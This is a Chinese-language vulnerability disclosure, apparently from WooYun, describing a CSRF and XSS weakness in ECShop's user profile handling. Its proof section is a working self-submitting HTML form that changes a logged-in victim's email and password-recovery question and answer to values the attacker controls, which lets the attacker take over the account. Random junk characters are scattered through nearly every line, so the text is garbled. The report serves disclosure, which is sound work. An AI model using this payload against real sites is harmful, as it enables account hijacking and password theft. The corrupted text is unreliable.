简要描述:
, u) S' I8 R$ [ Pecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现0 V4 ?% w9 r! Z# E3 W
9 u% l% P4 c* g* u, y$ w
Demo For:http://www.wooyun.org/bug.php?action=view&id=395& O$ f# _, a8 A
4 t( [' E4 S9 I1 y7 M8 }* m
详细说明:
) K0 ^* x' s$ r9 U$ A/ e; G利用csrf和xss可以突破官方所说的“障碍”
2 T& p3 m4 q8 c2 Z: g! Sxss版本已经有人说明/ H3 B$ f, v7 @# ~& P' K' q) \$ F
这里给出csrf版本( m% B, z9 q1 b2 x
# d9 ]* R8 J7 l
漏洞证明:
. c& y( v% ?3 p) j1 V<html>
' q$ f4 E' `7 ], t: [<body>
+ Z7 w2 o+ r2 \; P# {" z<form action="http://www.wooyun.org/ecshop/user.php" method="POST">4 U" n6 `+ {8 u
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
4 V' O, f4 c! F; {<INPUT TYPE="text" NAME="act" value="act_edit_profile">
- h: `3 T' S1 W<INPUT TYPE="text" NAME="sel_question" value="ecshop">3 X! O7 F1 T2 R4 b+ f9 j
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
& ^4 q/ C+ V" C( Q</body>
2 h# U- d7 k0 X: a6 ]. }4 }<script>! F! q- } ~: p1 L) Y0 u: J
document.forms[0].submit();
2 E# p& Z, v! J* o, | Q</script>8 m; a6 @ c9 X& I1 `* \$ N! _+ z
</html>
9 V6 V8 a4 c+ c+ H构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失, h' f6 d5 X* t+ E0 ~2 i& ]9 A
8 V# Q: f( s( p" w; \+ a
|